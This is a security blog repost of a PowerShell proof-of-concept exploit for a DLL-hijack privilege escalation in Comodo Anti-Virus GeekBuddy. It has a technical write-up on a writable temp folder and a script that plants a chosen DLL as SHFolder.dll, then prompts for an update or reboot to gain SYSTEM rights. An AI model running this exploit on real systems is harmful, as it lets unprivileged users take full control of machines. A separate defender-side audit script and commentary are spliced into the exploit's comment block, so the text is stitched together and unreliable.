K8拉登哥哥's Blog

K8搞基大队 [K8team]: information security, network security, 0day vulnerabilities, penetration testing, hacking

[Privilege Escalation] Comodo Anti-Virus SHFolder.DLL - Local Privilege Elevation Exploit

2016-04-19 17:10:44 | Category: Privilege escalation tools | Tags: (none)

<#
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
 
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
 
###Technical Geeky Stuff###
 
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
 
The directory listing is as follows:
10/06/2015  12:08 AM    <DIR>          .
10/06/2015  12:08 AM    <DIR>          ..
10/02/2015  10:43 PM                27 download.cfg
10/02/2015  10:47 PM           637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015  10:44 PM         2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015  10:44 PM           547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015  12:07 AM         1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015  10:44 PM           554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015  12:06 AM           950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015  12:08 AM           563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015  10:43 PM           768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015  12:08 AM           581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015  10:47 PM           459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015  10:46 PM         1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015  12:07 AM         1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015  12:07 AM           648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015  10:43 PM                 1 survey_version.txt
10/06/2015  12:05 AM    <DIR>          updates
 
The C:\ProgramData\Comodo\lps4\temp folder has the following permission configuration:
 
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                                BUILTIN\Administrators:(OI)(CI)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                BUILTIN\Users:(OI)(CI)(ID)R
                                BUILTIN\Users:(CI)(ID)(special access:)
                                                      FILE_WRITE_DATA
                                                      FILE_APPEND_DATA
                                                      FILE_WRITE_EA
                                                      FILE_WRITE_ATTRIBUTES
 
Notice how the folder grants Users FILE_WRITE_DATA and FILE_WRITE_EA access.  This gives
non-administrator users the ability to create new files in the directory, but not to delete or
modify existing files.
 
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe, which resides
in the C:\Program Files (x86)\Common Files\COMODO folder.  This service is auto-launched via the
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher.
 
This binary then launches Unit_Manager.exe from the C:\Program Files\COMODO\GeekBuddy folder with
SYSTEM-level privileges.  Unit_Manager.exe in turn launches C:\Program Files\COMODO\GeekBuddy\unit.exe
to handle each sub-process in the C:\ProgramData\Comodo\lps4\temp folder.
 
During client connections to the update servers and GeekBuddy executions, the unit.exe binary
launches setup_clps_client_transaction_release-4.19.365037.89.exe.  This setup binary has a
hardcoded DLL-loading procedure that looks for SHFOLDER.DLL in the directory it is executed
from:
 
.data:00409240                 dd offset aShfolder     ; "SHFOLDER"
.data:00409244                 dd offset aShgetfolderpat ; "SHGetFolderPathA"
 
During this delay-load procedure the exe loads SHFOLDER.DLL from its own directory before
searching the other locations in the DLL search path (including the PATH directories).
 
By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp folder and triggering an
update or a client connection to the secure servers (which occurs automatically at user login), a user
can elevate their privileges to SYSTEM and fully compromise the system.
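The following PowerShell script is an added defender-side example; it is not part of the original write-up or of Comodo's code. It checks a directory for the two conditions described above: an ACE that lets a low-privileged principal create files (the FILE_WRITE_DATA grant to BUILTIN\Users in the listing), and a DLL already present under a name the application resolves from its own directory first (SHFOLDER.DLL), which is the artifact a planted hijack leaves behind. The default directory is the path from the write-up; the list of DLL names to look for is a constructed assumption, and both are parameters.

```powershell
<#
Added example (not from the original post or from Comodo).
Audits one directory for:
  1. Allow ACEs giving a low-privileged principal the CreateFiles bit
     (FILE_WRITE_DATA), the latent DLL-planting condition; and
  2. DLLs already present whose name shadows a system DLL the application
     delay-loads, reported with their Authenticode status.
Assumptions: $Directory defaults to the path in the write-up, and
$ShadowedDllNames is a constructed list for this demo.
#>
[CmdletBinding()]
param(
    [string]$Directory = 'C:\ProgramData\Comodo\lps4\temp',
    [string[]]$ShadowedDllNames = @('shfolder.dll')
)

# Principals every ordinary logon session is a member of.  A create-file grant
# to any of these is reachable without administrative rights.
$LowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    'Everyone'
)

function Find-FileCreateAce {
    # Returns each Allow ACE on $Path that grants a low-privileged principal the
    # CreateFiles bit (FILE_WRITE_DATA).  Write, Modify and FullControl all
    # contain that bit, so a single -band test covers every such grant.
    param([Parameter(Mandatory)][string]$Path)

    $createBit = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $createBit) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Path
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

function Find-ShadowDll {
    # Lists DLLs in $Path whose name is in $Names, with signature details.
    # A system DLL name that is unsigned, or signed by an unexpected publisher,
    # sitting in a user-writable application folder is the hijack indicator.
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string[]]$Names
    )

    # -contains compares case-insensitively, so SHFolder.dll matches shfolder.dll.
    Get-ChildItem -LiteralPath $Path -Filter '*.dll' -File -ErrorAction SilentlyContinue |
        Where-Object { $Names -contains $_.Name } |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            [pscustomobject]@{
                File      = $_.FullName
                Size      = $_.Length
                Modified  = $_.LastWriteTime
                Signature = $sig.Status
                Signer    = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<none>' }
            }
        }
}

if (-not (Test-Path -LiteralPath $Directory -PathType Container)) {
    Write-Warning "$Directory does not exist; nothing to audit."
    return
}

$weakAces   = @(Find-FileCreateAce -Path $Directory)
$shadowDlls = @(Find-ShadowDll -Path $Directory -Names $ShadowedDllNames)

if ($weakAces.Count -gt 0) {
    Write-Host "Low-privileged principals can create files in ${Directory}" -ForegroundColor Yellow
    $weakAces | Format-Table -AutoSize
} else {
    Write-Host "No low-privileged file-create grant on ${Directory}" -ForegroundColor Green
}

if ($shadowDlls.Count -gt 0) {
    Write-Host "DLLs shadowing a system DLL name are present in ${Directory}" -ForegroundColor Red
    $shadowDlls | Format-Table -AutoSize
} else {
    Write-Host "No shadowing DLLs present in ${Directory}" -ForegroundColor Green
}
```

Run it as any user (Get-Acl only needs read access, which the listing above grants to Users). A weak-ACE hit alone means the hijack condition exists and the vendor's installer should be fixed or the grant removed; a hit in both checks means a DLL has already been planted and the file's signer, size and timestamp should go straight into the incident timeline.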
 
 
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
 
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times.  C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do.  #Ninja
Sizzop - for fixing my greetz
 
#########################################################################################################
 
 
#>
 
Param
(
 
    [Parameter(ValueFromPipelineByPropertyName = $true)]
    [string]$DLL = ""
)
 
 
 
 
# Refuse to continue if the supplied DLL path does not exist.
if (!(Test-Path $DLL))
{
    throw "Fatal Error: The specified file: $DLL does not exist."
}
 
# Plant the DLL under the name the delay-load stub resolves first (see the write-up above).
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
 
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
 
 
# Both assemblies are needed: Forms for NotifyIcon, Drawing for ExtractAssociatedIcon.
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Drawing")
 
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
 
 
# Reuse the running PowerShell host's icon for the tray balloon.
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
 
$objNotifyIcon.Visible = $True
$objNotifyIcon.ShowBalloonTip(8000)